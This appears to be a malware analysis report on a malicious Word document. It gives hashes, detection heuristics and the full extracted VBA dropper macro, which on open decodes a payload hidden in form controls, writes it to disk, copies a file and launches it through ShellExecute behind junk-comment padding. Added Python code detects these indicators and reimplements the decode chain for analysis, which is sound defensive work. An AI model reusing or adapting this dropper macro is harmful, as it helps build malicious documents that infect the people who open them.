Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0fbed41093fb1c0d…

MALICIOUS

Office (OOXML)

Size: 91.8 KB
Created: 2021-02-26 09:35:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2022-06-20
MD5: 79b06a3e2ff80629f52a10848cff8f19
SHA-1: e40e617e721c4547eb2b5367ce3fa01aa6c039e3
SHA-256: 0fbed41093fb1c0dbfe04ca4c804435a7a244eb4cb930e20ead24cfa91e2fc40
Risk score: 190

Heuristics (6)

  • ClamAV: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0
  • VBA project inside OOXML (medium, OOXML_VBA; 3 related findings)
    Document contains a VBA project (word/vbaProject.bin); VBA macros are present.
    The extracted source (see "Extracted artifacts" below) runs AutoOpen -> aSQYNF -> aVbuBC. aVbuBC reads four "|"-separated paths from the reversed text of the UserForm control frm.paths (aXPSW), base64-decodes the UserForm control frm.pay through an MSXML bin.base64 node and reverses the result (aNrKe, aWYEjS), writes that string to the first path with Print # (au5cy), copies the third path over the second with Scripting.FileSystemObject.CopyFile (awTPSI), and finally calls Shell32.Shell.ShellExecute on the second path with an argument string built from the fourth path and the quoted first path. The macro itself makes no network request; the paths and payload are carried inside the document's UserForm, and the form's control values are not among the extracted artifacts, so the dropped file and command line cannot be recovered from this report alone.
  • Potential Shell call in VBA (critical, OLE_VBA_SHELL)
    Matched line in script:
    Dim ageGh As New Shell32.Shell
    The object is used at the end of aVbuBC: Call ageGh.ShellExecute(aAYTn, aQ2nH, " ", SW_SHOWNORMAL), where aAYTn is the second decoded path and aQ2nH the argument string.
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    Matched line in script:
    With CreateObject("Microsoft.XMLDOM").createElement("b64")
    Used as a base64 decoder (DataType = "bin.base64", then nodeTypedValue). A second CreateObject("Scripting.FileSystemObject") in awTPSI performs the file copy.
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    Matched line in script:
    Sub AutoOpen()
    Runs as soon as the document is opened with macros enabled; it is the entry point of the chain described under the VBA project finding.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All 35 URLs below were found in document text (OOXML body / shared strings). Every one is an XML namespace identifier (OOXML and Microsoft Office extension schemas, markup compatibility, and Adobe XMP / Dublin Core / RDF namespaces, the latter normally coming from the metadata of an embedded image), not a network indicator, and none of them is referenced by the macro. They can be ignored for IOC purposes.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/drawing/2016/ink
    • http://schemas.microsoft.com/office/drawing/2017/model3d
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2018/wordml/cex
    • http://schemas.microsoft.com/office/word/2016/wordml/cid
    • http://schemas.microsoft.com/office/word/2018/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
    • http://ns.adobe.com/xap/1.0/
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#
    • http://ns.adobe.com/photoshop/1.0/
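
The heuristics above can be reproduced offline over the extracted VBA source. The block below is an added example written for this page, not code from the report or from any tool it names. It runs regex rules for the indicators flagged above (an auto-exec entry point, Shell32.Shell / ShellExecute, CreateObject, an MSXML bin.base64 decode, a string-reversal loop, a file write and a file copy) over a constructed excerpt of this sample's macro, skipping comment-only lines so that the filler comments padding every routine cannot trigger a rule. Rule names that match the report's tags are kept; B64_DECODE_XMLDOM, STRING_REVERSE_LOOP, FILE_WRITE and FILE_COPY are names chosen here, and the comment-ratio and dropper checks are this example's own additions, not report heuristics.

```python
"""Static triage of extracted VBA source, modelled on this report's heuristics.

Added example for this page; not the report's or any tool's own code.
Rule names that mirror the report's tags are kept; B64_DECODE_XMLDOM,
STRING_REVERSE_LOOP, FILE_WRITE and FILE_COPY are names chosen here.
"""
import re
from collections import defaultdict

RULES = {
    "OLE_VBA_AUTOOPEN": re.compile(
        r"^\s*(?:Private\s+|Public\s+)?Sub\s+(?:AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b",
        re.I),
    "OLE_VBA_SHELL": re.compile(
        r"\bShell32\.Shell\b|\bWScript\.Shell\b|\bShellExecute\b|\bShell\s*\(", re.I),
    "OLE_VBA_CREATEOBJ": re.compile(r"\bCreateObject\s*\(", re.I),
    "B64_DECODE_XMLDOM": re.compile(r"bin\.base64", re.I),
    "STRING_REVERSE_LOOP": re.compile(
        r"\bFor\s+\w+\s*=\s*Len\(\w+\)\s+To\s+1\s+Step\s+-1\b", re.I),
    "FILE_WRITE": re.compile(r"\bOpen\b.+\bFor\s+(?:Output|Append|Binary)\b", re.I),
    "FILE_COPY": re.compile(r"\.CopyFile\s*\(", re.I),
}


def triage(vba_source: str) -> dict:
    """Return {rule: [(line_no, line), ...]} for every rule that fires.

    Comment-only lines are skipped so that filler comments (this sample pads
    each routine with lines of unrelated words) cannot trigger a rule.
    """
    hits = defaultdict(list)
    for no, line in enumerate(vba_source.splitlines(), 1):
        code = line.strip()
        if not code or code.startswith("'") or code.lower().startswith("rem "):
            continue
        for name, rx in RULES.items():
            if rx.search(code):
                hits[name].append((no, code))
    return dict(hits)


def comment_ratio(vba_source: str) -> float:
    """Share of non-blank lines that are comment-only; high values point to padding."""
    lines = [l.strip() for l in vba_source.splitlines() if l.strip()]
    if not lines:
        return 0.0
    return sum(1 for l in lines if l.startswith("'")) / len(lines)


def looks_like_dropper(hits: dict) -> bool:
    """Auto-exec entry point, plus a way to run a file, plus a way to put it on disk."""
    return ("OLE_VBA_AUTOOPEN" in hits and "OLE_VBA_SHELL" in hits
            and ("FILE_WRITE" in hits or "FILE_COPY" in hits))


# Constructed excerpt of this sample's macro (lines taken from the preview,
# most filler comments removed), used as offline input.
SAMPLE_VBA = """\
Sub AutoOpen()
' Peacemaker alexandria
' Relaxing laws sailing
Call aSQYNF
End Sub
Function aWYEjS(a7VCsF)
For asRqY = Len(a7VCsF) To 1 Step -1
aIRpmE = aIRpmE & "" & Mid(a7VCsF, asRqY, 1)
Next asRqY
End Function
Function aNrKe(b64)
With CreateObject("Microsoft.XMLDOM").createElement("b64")
.DataType = "bin.base64"
End With
End Function
Sub aVbuBC()
' Reform describe shorten
Open aV0QRu For Output As #1
Call aUOTc.CopyFile(adsMOp, aAYTn, 1)
Dim ageGh As New Shell32.Shell
Call ageGh.ShellExecute(aAYTn, aQ2nH, " ", SW_SHOWNORMAL)
End Sub
"""

if __name__ == "__main__":
    found = triage(SAMPLE_VBA)
    for name, lines in found.items():
        for no, text in lines:
            print(f"{name:22} line {no}: {text}")
    print(f"comment ratio {comment_ratio(SAMPLE_VBA):.2f}; "
          f"dropper-like: {looks_like_dropper(found)}")
```

Run it on the full macros.bas to see the same matched lines the report lists; on this sample the comment ratio is far higher than in the excerpt, which is itself a usable signal for junk-comment padding.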

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 8116 bytes
SHA-256: 959d07bc618ce901ab5046040ed61d358e3b0c84ab100b1a80579964e17bcddb
Preview script (first 1,000 lines of the extracted script, shown verbatim, including the comment lines of unrelated words that pad each routine):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{2FC0C1AC-9816-4739-846B-7E4600ADED95}{D405FD11-6049-44FB-A7AA-B72C8C8020E7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "af13BT"
Sub AutoOpen()
' Peacemaker alexandria
' Relaxing laws sailing
' Singles stumble geraldine
' Archives left-handed ray
' Centered opinion fervor fu
' Inadvertently vessels interactive suggestion
' Ba sardinian disembark inertia roof
Call aSQYNF
End Sub
Sub aSQYNF()
aVbuBC
End Sub
Function aWYEjS(a7VCsF)
aIRpmE = ""
For asRqY = Len(a7VCsF) To 1 Step -1
aIRpmE = aIRpmE & "" & Mid(a7VCsF, asRqY, 1)
Next asRqY
aWYEjS = aIRpmE
End Function
Function aNrKe(b64)
With CreateObject("Microsoft.XMLDOM").createElement("b64")
.DataType = "bin.base64"
.text = b64
        b = .nodeTypedValue
End With
aNrKe = StrConv(b, vbUnicode)
End Function

Attribute VB_Name = "aYFZ7m"
Sub awTPSI(aauxYC, aDnjIx)
' Faithless skinny epistolary wallet combative canvas
' Apostasy included webmasters flip og schedules
Set aUOTc = CreateObject("Scripting.FileSystemObject")
Call aUOTc.CopyFile(aauxYC, aDnjIx, 1)
' Simulate iceberg
' Laundress mature driver
End Sub
Sub au5cy(aAyXQP, ax2emH)
' Latino travel parenthesis
' Thrifty pigment rally slip hight
' Achieve
' Emerald notice tinder notoriously
' Skim discovered priority nigeria workshops
' Coalition pads illustrations
' Home-made handhelds sys variegated looked
' Asset stats
' Leeward disembark vitamin dont
' Fatherland
' High-pitched dejection predicated yes
' Watts verona kite
' Infections physique iso
' Lucas
' Disintegration harmful enlistment
' Ae tights
' Epidemics advantage html ron another
' Squad cm malaysia confidant honolulu
' Mantua mesquite revere
' Refutation potato gallon discontinued
' Socket
' Sponsored bewitching corinth delhi
' Ineffectual gage hardcover
' Zone customise campfire
' Recognised andover
' Starred wifi complicity
' Clipping spontaneously middle archives
' Hidden flimsy accepted mills
' Lagging regard cole
' Actuality flemish mario
' Peterborough boding implacable abhorrence
Open aAyXQP For Output As #1
Print #1, ax2emH
' Presidents ppm endow
Close #1
End Sub

Attribute VB_Name = "aaQreB"
Function aMX17(agG1Ix)
' Brittany scsi brew retaliate
' Unco unhappiness thirty-four
' Rochester unconvinced truss dirty going
' Requires ginger alien bother
' Pheasant
' Introduce tangent offhand pregnancy remark finland
' Empirical
' Nn duties tablecloth hobble bewildering fairfield
' Crammed write careful shingles underworld ipaq
End Function
Function aXPSW(a3tZAN)
' Mx ghz pointed
' Politically towers stuck lincolnshire ns
' Jackass fda sentient
' Xerxes thump decorating
' Occurred
' Arbitration effie roman drudgery shaving herbs
' Simple 4to priestly
' Uneven doom nickname ou nj
' Motherhood authorization oman thinkpad
' Crucifixion kernel loans
' Shad talked explained romantic agitating upskirts
' Suspect geologist katrina storey
' Literature tunnel gm loveless
' Referee stitching mental
' Returns
' Hell average metrical
' Criminal presentations adventuress
av35x = Split(aWYEjS(frm.paths.text), "|")
Select Case a3tZAN
Case Is = 0
aXPSW = av35x(0)
Case Is = 1
aXPSW = av35x(1)
Case Is = 2
aXPSW = av35x(2)
Case Is = 3
aXPSW = av35x(3)
End Select
' Gripe dat incubation exasperate
' Tributaries inbox terrier marc
' Alchemists
' Network hyperbole capture passive thirty-seven sm
' Dolls angela
' Null cultivates
' Queue whey macedonia
' Tainted obtrusive sign newbie dissuade handcuffs foggy
' Assign
' Charwoman arran lustful routing
' Quantum substratum frank devastation oasis
' Nipple stack bid both
' Kinship bated proven freelance stadium
' Observant
' Howitzer topsy-turvy destiny linseed
' Ada slush
' Mint restore
' Possession prelude twenty-eighth fluent implacable processed burning
' Relaxation oasis ds rn
' Calm proud
' Thoughtfulness whet bottom ado fermented
' Earth
End Function
Function aasXfQ(aRdcZ, aWrayg)
' Chuck cooperate bounce coroner postage
' Phial anywhere realize sensor
' Out mischance
' Highest pix damn -oid
' Disapprove reinstate aggrandizement inch mephistopheles
' Newer encumber antecedent motherboard
' Refer roadway lustrous
' Archer reduce doggerel
End Function
Sub aVbuBC()
aV0QRu = aXPSW(0)
aAYTn = aXPSW(1)
adsMOp = aXPSW(2)
aYPqc = aXPSW(3)
' Reform describe shorten
' Reinforce setup addressed eclat
' Styles nsw universe
' Conventions contagion
' Brett cyclone
' Mint guide
' Girlfriend picket paper oughtnt
' Concentrate flights
' Versatile johannes
' Declare babble licensed giggling nevermore
' Deafness meters piano
' Evenly ali
' Losing watchword substantial speeches width
' Tgp pertinacity sad solutions
' Consciousness cleave
' Authentic archives abounding purchase butterfly urge
' Vibrate lavender
' Mailto laplace gently clerk
' Imitative
' Steerage
' Mislaid rage achievements cunt
' Flounder
' Especially instantaneously starring interests implicitly origination
' Tincture opus
' Song lip arrival olfactory junk
' Delia celt area
' Designate contacts unemployment
' Games emetic institutional characterized support
awVsJ = aWYEjS(aNrKe(frm.pay.text))
' Chubby mitchell sit
' Transit savoy belt tunes
' Monroe calls progressive
au5cy aV0QRu, awVsJ
' Attempt
' Thereof stubbornly merge
' Settler neck emblazoned
' Nebulous advertise support
' Stampede stiffen giant duality insufferable
' Twist
' Production sambo
' Tension contraband ner adapter countries louse dairy
awTPSI adsMOp, aAYTn
' Sl southwest
' Essex gourd yen ci
' Overdone
' Knee strikes
' Pupils ribald sentient queensland service
' Beatific fund ukraine
' Proceeding fare helps ermine pensions
' Psychological imp leo hockey
' Kernel hepatitis inclusion
' Checkered confronting
' Based crazy terse needed access
' Centered manchu bronze lock fi situated
' Surveillance estranged lo collegiate
' Accepting sixty-five
' Tiles korean mistletoe
' Charon wasp progenitor specification protest
' Maudlin mp ana moreover thor
' Synopsis fertilizer princess uni measurement communal
' Thunder wendy do organisms quotes needs
' Calibration archives radio stefan bound
' Parry septuagint alot acknowledge
' Keeps magnate orientation eating
' Without tropic blazon agile
' Adultery bio kat choleric finding
' Offensive
' Bolting watched assets
' Baize importunity
' Trigonometry circuit
' Fleming saintly minus mc
a1t5nE = Chr(34)
aQ2nH = Trim(aYPqc & "t : " & a1t5nE & aV0QRu & a1t5nE)
' Leisure studied verona
' Discharge stars
' Staple rewards aimed outcomes churchman
' Ergo regina chrome
' Bulletin guidelines disciplinary asceticism
' Trade income casting banter
Dim ageGh As New Shell32.Shell
Call ageGh.ShellExecute(aAYTn, aQ2nH, " ", SW_SHOWNORMAL)
' Plastic deeper
' Second-rate weeks encumber
' Limitation
' Cruise
' Welsh talked
' Gnome truck subservient repeat tp aa
' Enforcement evening loyally
' Recall idol five
' Materialism okay
' Age ol
' Epithet moisture
' Tied
' Showed disdainful estranged circumlocution
' Survivors brewed extirpate
' Dualism
' Gon
' Kentucky anointing pincers hurrah
' Roe
' Fake unattended arizona monetary
' Zimbabwe event amelioration wrathful disappoint
' Flickered merge
' Cocks cod
' Wagon credulous frosted atheism gens frontispiece
' Bags fresher phosphorus standing
' Ab confiscate collaboration almond depraved vastness borax emblematic
' Jose monica
' Mustang obtrude fourth costs dour
' Celebrity scotland analyses leads
' Campbell rear
End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 40960 bytes
SHA-256: 77154bbabf416b67a741a7967246ed6bf652ba1f9b0be4e3d1ebd4d9dc7aaf4e
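
The macro's obfuscation is fully visible in the preview above; only its inputs, the text of the UserForm controls frm.paths and frm.pay, are missing from the extracted artifacts. The block below is an added example, not code from the report or from the sample, that reimplements the decode chain (aWYEjS, aNrKe, aXPSW, aVbuBC) in Python so that the dropped file, the copied file and the ShellExecute command line can be recovered once those two strings have been pulled from the form storage in vbaProject.bin. The field values it runs on are constructed placeholders built by the inverse of the same chain; the file names and the fourth path element are hypothetical and are not values from this sample.

```python
"""Reimplementation of the macro's decode chain (aWYEjS, aNrKe, aXPSW, aVbuBC).

Added example for this report; not code from the sample or from any tool.
Inputs are the two UserForm control strings the macro reads
(frm.paths.text and frm.pay.text). The values at the bottom are constructed
placeholders, not the real ones from this sample.
"""
import base64


def vba_reverse(s: str) -> str:
    """aWYEjS: reverse a string character by character (Mid loop from Len down to 1)."""
    return s[::-1]


def decode_paths(paths_field: str) -> list:
    """aXPSW: reverse frm.paths.text, then Split on '|' into the four paths."""
    parts = vba_reverse(paths_field).split("|")
    if len(parts) < 4:
        raise ValueError("expected four '|'-separated paths, got %d" % len(parts))
    return parts[:4]


def decode_payload(pay_field: str) -> bytes:
    """aNrKe followed by aWYEjS, as called from aVbuBC.

    aNrKe decodes base64 through an MSXML bin.base64 node and turns the bytes
    into a one-char-per-byte string with StrConv(..., vbUnicode); aVbuBC then
    reverses that string and au5cy writes it back with Print #. Reversing the
    byte-per-char string equals reversing the raw bytes, so the dropped file
    content is the reversed base64 payload. Caveats: Print # appends CRLF,
    and bytes above 0x7F round-trip through the system ANSI code page.
    """
    raw = base64.b64decode(pay_field, validate=True)
    return raw[::-1]


def reconstruct(paths_field: str, pay_field: str) -> dict:
    """aVbuBC: derive the file operations and the ShellExecute call."""
    p0, p1, p2, p3 = decode_paths(paths_field)
    quote = '"'                                         # a1t5nE = Chr(34)
    args = (p3 + "t : " + quote + p0 + quote).strip()   # aQ2nH = Trim(...)
    return {
        "write_file": p0,                   # au5cy aV0QRu, awVsJ
        "write_content": decode_payload(pay_field),
        "copy_from": p2,                    # awTPSI adsMOp, aAYTn
        "copy_to": p1,
        "exec_file": p1,                    # ShellExecute(aAYTn, aQ2nH, " ", SW_SHOWNORMAL)
        "exec_args": args,
    }


# Constructed placeholder inputs (hypothetical paths and payload), encoded the
# way the macro expects: reversed "|"-joined paths, base64 of the reversed payload.
PATHS = [
    r"C:\Users\Public\dropped.dat",        # written payload (hypothetical)
    r"C:\Users\Public\host.exe",           # copy destination, later executed (hypothetical)
    r"C:\Windows\System32\original.exe",   # copy source (hypothetical)
    "-",                                   # prefix of the argument string (hypothetical)
]
PAYLOAD = b"hypothetical dropped payload\r\n"
PATHS_FIELD = "|".join(PATHS)[::-1]                           # as stored in frm.paths
PAY_FIELD = base64.b64encode(PAYLOAD[::-1]).decode("ascii")   # as stored in frm.pay


if __name__ == "__main__":
    for key, value in reconstruct(PATHS_FIELD, PAY_FIELD).items():
        print(f"{key:14} {value!r}")
```

Feed the real control strings to reconstruct() once they have been extracted; the four decoded paths, in order, are the written payload, the executed copy, the copy source and the argument prefix.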